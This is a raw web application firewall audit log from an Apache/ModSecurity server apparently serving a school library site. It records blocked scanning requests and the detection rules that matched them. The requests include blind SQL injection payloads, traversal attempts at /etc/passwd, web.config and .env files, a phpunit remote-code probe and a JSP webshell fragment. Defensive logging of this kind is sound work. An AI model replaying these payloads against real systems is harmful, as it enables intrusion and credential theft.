aC5BCmfriXjg62qQwE_hUQAAAIk 103.236.140.4 47878 103.236.140.4 8181 --83cdcf58-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168341481 --83cdcf58-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M ';waitfor delay '0:0:3'-- --ad74b702-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad74b702-E-- --ad74b702-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /services/userInfoWeb"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294804377 3225 (- - -) Stopwatch2: 1747867294804377 3225; combined=1937, p1=470, p2=1448, p3=0, p4=0, p5=19, sr=182, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad74b702-Z-- --cc6d780f-A-- [22/May/2025:05:41:34 +0700] aC5WnmfriXjg62qQwE_iyQAAAIw 103.236.140.4 53712 103.236.140.4 8181 --cc6d780f-B-- POST /u9/OnLine/UMWebService.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 371 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetLogContent" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 164577495 --cc6d780f-C-- ../web.config --cc6d780f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc6d780f-H-- Message: Access denied with code 403 (phase 2). Matched phrase "Web.config" at XML. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: Web.config found within XML: web.config\x0a \x0a \x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294804164 3885 (- - -) Stopwatch2: 1747867294804164 3885; combined=2380, p1=485, p2=1861, p3=0, p4=0, p5=33, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc6d780f-Z-- --31abb257-A-- [22/May/2025:05:41:34 +0700] aC5WnmfriXjg62qQwE_iywAAAI4 103.236.140.4 53720 103.236.140.4 8181 --31abb257-B-- GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168533974 --31abb257-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --31abb257-E-- --31abb257-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294805860 2417 (- - -) Stopwatch2: 1747867294805860 2417; combined=1388, p1=337, p2=1027, p3=0, p4=0, p5=24, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31abb257-Z-- --224d3a3f-A-- [22/May/2025:05:41:34 +0700] aC5WnuThJmFSRJ5-OZdV3AAAAFg 103.236.140.4 53702 103.236.140.4 8181 --224d3a3f-B-- POST /services/operOriztion HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 517 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 167870470 --224d3a3f-C-- ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))-- --224d3a3f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --224d3a3f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) found within MATCHED_VAR: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294804198 4742 (- - -) Stopwatch2: 1747867294804198 4742; combined=3294, p1=380, p2=2883, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --224d3a3f-Z-- --8b62c14f-A-- [22/May/2025:05:41:34 +0700] aC5WnmfriXjg62qQwE_izAAAAI8 103.236.140.4 53750 103.236.140.4 8181 --8b62c14f-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+ HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/json Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168511164 --8b62c14f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8b62c14f-E-- --8b62c14f-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294806681 3669 (- - -) Stopwatch2: 1747867294806681 3669; combined=2289, p1=473, p2=1769, p3=0, p4=0, p5=47, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b62c14f-Z-- --30c21846-A-- [22/May/2025:05:41:34 +0700] aC5Wniektx75wRFPQyh8XgAAANA 103.236.140.4 53788 103.236.140.4 8181 --30c21846-B-- POST /ufgovbank HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 159416386 --30c21846-C-- reqData= &signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest --30c21846-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30c21846-E-- --30c21846-H-- Message: Access denied with code 403 (phase 2). Pattern match "<\\!(doctype|entity)" at ARGS:reqData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "92"] [id "212860"] [rev "4"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294807128 3527 (- - -) Stopwatch2: 1747867294807128 3527; combined=2134, p1=453, p2=1647, p3=0, p4=0, p5=33, sr=86, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30c21846-Z-- --e9048e40-A-- [22/May/2025:05:42:34 +0700] aC5W2mfriXjg62qQwE_i1AAAAIU 103.236.140.4 53864 103.236.140.4 8181 --e9048e40-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept-Charset: utf-8 --e9048e40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9048e40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747867354279374 875 (- - -) Stopwatch2: 1747867354279374 875; combined=379, p1=340, p2=0, p3=0, p4=0, p5=39, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9048e40-Z-- --b3e73e2a-A-- [22/May/2025:05:53:27 +0700] aC5ZZ2friXjg62qQwE_jFwAAAIg 103.236.140.4 54824 103.236.140.4 8181 --b3e73e2a-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.198 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --b3e73e2a-C-- --b3e73e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3e73e2a-E-- --b3e73e2a-H-- Message: Access denied with code 403 (phase 2). String match " --a7acec1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7acec1b-E-- --a7acec1b-H-- Message: Access denied with code 403 (phase 2). String match " --8eca8d46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eca8d46-E-- --8eca8d46-H-- Message: Access denied with code 403 (phase 2). String match " --f612384c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f612384c-H-- Message: Access denied with code 403 (phase 2). String match " --8c7a3021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c7a3021-E-- --8c7a3021-H-- Message: Access denied with code 403 (phase 2). String match " --39569c70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39569c70-E-- --39569c70-H-- Message: Access denied with code 403 (phase 2). String match " --52b10d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52b10d4b-H-- Message: Access denied with code 403 (phase 2). String match " --e5c99232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5c99232-E-- --e5c99232-H-- Message: Access denied with code 403 (phase 2). String match " out.println("ilcuotvklp");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --d3144b1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3144b1b-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../0U9nv.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870300889087 2945 (- - -) Stopwatch2: 1747870300889087 2945; combined=1759, p1=364, p2=1367, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3144b1b-Z-- --5bc1656e-A-- [22/May/2025:06:31:43 +0700] aC5iX2friXjg62qQwE_kWwAAAIE 103.236.140.4 58426 103.236.140.4 8181 --5bc1656e-B-- GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163513649 --5bc1656e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5bc1656e-E-- --5bc1656e-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870303893793 4018 (- - -) Stopwatch2: 1747870303893793 4018; combined=2002, p1=606, p2=1351, p3=0, p4=0, p5=45, sr=164, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bc1656e-Z-- --aecf4e01-A-- [22/May/2025:06:31:43 +0700] aC5iX2friXjg62qQwE_kXAAAAIQ 103.236.140.4 58426 103.236.140.4 8181 --aecf4e01-B-- GET /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168342231 --aecf4e01-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aecf4e01-E-- --aecf4e01-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870303898586 2182 (- - -) Stopwatch2: 1747870303898586 2182; combined=1233, p1=323, p2=882, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aecf4e01-Z-- --ffdc452d-A-- [22/May/2025:06:31:44 +0700] aC5iYGfriXjg62qQwE_kXgAAAIY 103.236.140.4 58448 103.236.140.4 8181 --ffdc452d-B-- GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168342234 --ffdc452d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ffdc452d-E-- --ffdc452d-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870304882214 2868 (- - -) Stopwatch2: 1747870304882214 2868; combined=1338, p1=393, p2=903, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffdc452d-Z-- --fe97205c-A-- [22/May/2025:06:41:12 +0700] aC5kmCektx75wRFPQyh-FAAAAMQ 103.236.140.4 59214 103.236.140.4 8181 --fe97205c-B-- GET /@fs/C://windows/win.ini?import&?inline=1.wasm?init HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 213.136.68.40 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 213.136.68.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 --fe97205c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe97205c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870872737229 2507 (- - -) Stopwatch2: 1747870872737229 2507; combined=1214, p1=413, p2=771, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe97205c-Z-- --e733d123-A-- [22/May/2025:06:41:12 +0700] aC5kmGfriXjg62qQwE_klQAAAIY 103.236.140.4 59216 103.236.140.4 8181 --e733d123-B-- GET /@fs/C://windows/win.ini?raw?? HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 213.136.68.40 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 213.136.68.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 --e733d123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e733d123-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870872741886 1776 (- - -) Stopwatch2: 1747870872741886 1776; combined=814, p1=337, p2=449, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e733d123-Z-- --69887b56-A-- [22/May/2025:06:45:11 +0700] aC5lh30O04WKE1HJ5iT9PQAAAAI 103.236.140.4 59662 103.236.140.4 8181 --69887b56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Lite) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --69887b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69887b56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747871111401970 773 (- - -) Stopwatch2: 1747871111401970 773; combined=333, p1=290, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69887b56-Z-- --d63eba0d-A-- [22/May/2025:06:46:23 +0700] aC5lz30O04WKE1HJ5iT9WwAAAAw 103.236.140.4 59746 103.236.140.4 8181 --d63eba0d-B-- GET /attachment?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Accept-Language: 